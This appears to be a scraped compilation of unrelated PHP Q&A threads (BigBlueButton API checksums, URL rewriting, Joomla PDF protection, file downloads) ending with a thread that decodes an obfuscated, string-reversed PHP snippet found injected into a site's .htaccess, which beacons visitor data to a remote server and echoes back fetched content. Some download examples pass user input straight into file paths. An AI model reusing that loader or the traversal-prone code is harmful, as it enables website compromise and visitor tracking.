I want create bigbluebutton webhoock, but "checksum" it's not correct
<?php
$urljoin ="https://server1.example.com/bigbluebutton/api/hooks/create?";
$params ='callbackURL=' .urlencode('http://example.net');
echo $urljoin.$params.'&checksum='.sha1('create'.$params.'S8BFPSCuY6XTghtr3iuNrOJhCKMJEV0W0dkfppjow');
}
please guide me
thanks
Your code is having several issues. Here is the code that you can refer to.
$bbb_url = "https://your_domain/bigbluebutton";
$bbb_secret = "YOUR_BBB_SECRET";
$api_name = "create";
$parameter = "name=Test&meetingID=test01";
$checksum = sha1($api_name . $parameter . $bbb_secret);
$query = $parameter . "&checksum=" . $checksum;
$url = $bbb_url . "/api/" . $api_name . "?" . $query;
header("HTTP/1.1 301 Moved Permanently");
header("Location: $url");
Check the official document for more help about create API call: https://docs.bigbluebutton.org/dev/api.html#create
Related
Im having trouble with my XAMPP website. I want to make a sort of profile like thing where users type (for example) https://howcoolitis.net/profile/useridhere
but that ends up just giving an error.
To be sincere, for the i have tried thing, There is not anything that i have tried apart from google searching similar like items, I don't really know what it is called to be honest, since i have never used it before but I want to use it.
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
$url = "https";
else
$url = "http";
// Here append the common URL characters.
$url .= "://";
// Append the host(domain name, ip) to the URL.
$url .= $_SERVER['HTTP_HOST'];
// Append the requested resource location to the URL
$url .= $_SERVER['REQUEST_URI'];
// Print the link
$pos = strrpos($url, '/');
$search = $pos === false ? $url : substr($url, $pos + 1);
I was expecting for it to just give me the text after the url but it just gives a 404.
How to rewrite my website's url from "website.com/example.php?site=youtube" to "website.com/example/youtube" where site is a variable?
Should i change the url in the php file too?
You can use this in your .htaccess file:
RewriteEngine On
RewriteRule ^example/([^/]*)$ /example.php?site=$1 [L]
That will leave you with the following URL: http://website.com/example/youtube. Make sure you clear your cache before you test this.
$connection = mysqli_connect("localhost" , "root" , "" , "test");
$query = "SELECT * FROM websites";
$select_all_sites = mysqli_query($connection,$query);
while ($row = mysqli_fetch_assoc($select_all_sites)) {
$site_title = $row['site_title'];
echo "<a class='item' href='site.php?website=$site_title'> $site_title</a>";
On the other page which is called site.php i am using this code to get the variable from the sites.php page
function myname(){
if(isset($_GET['website'])){
$variable = $_GET['website'];
echo $variable;
}
}
I have a joomla site. And have some pdf files into the root of the website.
Is there a way to protect the DIRECT ACCESS to the pdf's for the GUESTS(public) users.. and allow for REGISTERED users?
I tried with htaccess(deny) but registered users can't view the pdf directly too..
Searched but didn't find nothing about this.. PLEASE can somebody help.
Thank you
You must use document management plug-in if you wont want to write your own php codes.SO, DOCman is a powerful document management solution for Joomla. You can check it from following link.
http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10958
Create a file called download.php
Add the following code to download.php file enclose with php tag
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
if (file_exists(dirname(__FILE__) . '/defines.php')) {
include_once dirname(__FILE__) . '/defines.php';
}
if (!defined('_JDEFINES')) {
define('JPATH_BASE', dirname(__FILE__));
require_once JPATH_BASE.'/includes/defines.php';
}
require_once JPATH_BASE.'/includes/framework.php';
// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;
// Instantiate the application.
$app = JFactory::getApplication('site');
// Initialise the application.
$app->initialise();
$user = JFactory::getUser();
$getfile = JRequest::getVar('file',null,'get','string');
if($getfile){
if($user->get('id') == 0){
die('permission denied');
}
$link = "/files/".$getfile.".pdf"; // Locate the pdf file
$file = JPATH_SITE.$link;
header("Content-Type: application/octet-stream");
$filename = $getfile.'.pdf';
header("Content-Disposition: attachment; filename=".urlencode($filename));
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");
header("Content-Length: " . filesize($file));
flush(); // this doesn't really matter.
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush(); // this is essential for large downloads
}
fclose($fp);
}
$app->close();
URL example :- www.example.com/download.php?file=filename
And make sure you have change the $link variable as you need.
In .htacess file you have to add the following code
deny from all
And it should be located under the invoice folder where the pdf files is located.
If you use deny from all then file do not have download access for the particular directory where the htacess file is located.
To allow download access for registered user the below controller has to be called instead of direct file path url.
URL example :- www.example.com/index.php?option=com_temp&task=temp.downloadmypdf&file=filename
public function downloadmypdf(){
$user = JFactory::getUser();
$getfile = JRequest::getVar('file');
if($user->get('id') == 0){
die('permission denied');
}
$link = "/invoice/".$getfile.".pdf";
$file = JPATH_SITE.$link;
header("Content-Type: application/octet-stream");
$filename = $getfile.'.pdf';
header("Content-Disposition: attachment; filename=".urlencode($filename));
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");
header("Content-Length: " . filesize($file));
flush(); // this doesn't really matter.
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush(); // this is essential for large downloads
}
fclose($fp);
JFactory::getApplication()->close();
}
Credits goes to Ashlin rejo.
I'm trying to download a file using readfile(); in PHP but I'm having trouble, here's my code:
<?php
$getdir = $_GET['dir'];
$getdoctype = $_GET['doctype'];
$getfile = $_GET['filename'];
$dir = "/var/www/uploads/$getdir/$getdoctype/";
$type = mime_content_type( $dir . '/' . $getfile );
$contents = file_get_contents($dir . '/' . $getfile);
if (file_exists($getfile)) {
header('Content-Type: ' . $type);
header('Content-Disposition: attachment;filename=' . $getfile);
readfile($getfile);
}
else{
echo "File Not Found";
}
?>
What am I doing wrong? I want to download the file thats stored in $getfile variable. I want to use all filetypes and all filesizes so thats why I did it like this.
The error I keep getting when I click on the file is: "File Not Found" as per my code. But it does exist.
Please also keep in mind that the website that host these files is SSL enabled
You should try replace this code:
file_exists($getfile) => file_exists($dir . '/' . $getfile)
readfile($getfile); => readfile($dir . '/' . $getfile);
But it's very dangerous use $_GET parameters to load file from filesystem, don't use this code on public website.
Your not pointing to the file correctly.
<?php
$getdir = $_GET['dir'];
$getdoctype = $_GET['doctype'];
$getfile = $_GET['filename'];
$dir = "/var/www/uploads/$getdir/$getdoctype/";
if (file_exists($dir . $getfile)) {
$type = mime_content_type( $dir . $getfile );
header('Content-Type: ' . $type);
header('Content-Disposition: attachment;filename=' . $getfile);
readfile($dir . $getfile);
}
else{
echo "File Not Found";
}
?>
Found a code this morning encoded under several layers attached to a website I administer's .htaccess. The code reads as follows:
function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif# = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes# { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));
Clearly details of the function are written in reverse. It looks like it is sending log information to a remote server. Anyone familiar with this code or what it is doing?
Looks like pretty heavily obfuscated stat-tracking code, but I'm more inclined to say it's malicious. s37, as noted, reverses the string:
function s37($s)
{
$e = "";
for ($a = 0; $a <= strlen($s)-1; $a++ )
{
$e .= $s{strlen($s)-$a-1};
}
return($e);
}
This, in turn, generates the following code:
$z37="stats";
$h37="http";
$c37="in";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37])))
{
}
else
{
#setcookie($z37,md5("stats"),time()+10800);
$url = #file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
if (strstr($url,"!go!"))
{
$url = explode("!go!",$url);
$url = $url[1];
echo $url;
}
}
The user-agent matching stuff prevents search engine bots from running the code. Otherwise, for browsers, a cookie gets set, then some code gets downloaded from a remote server and echoed out. The purpose of the code that's downloaded is hard to ascertain without more info.
function s37 reverses the supplied string. function s37 doe only go for the first little bit of the line of code though...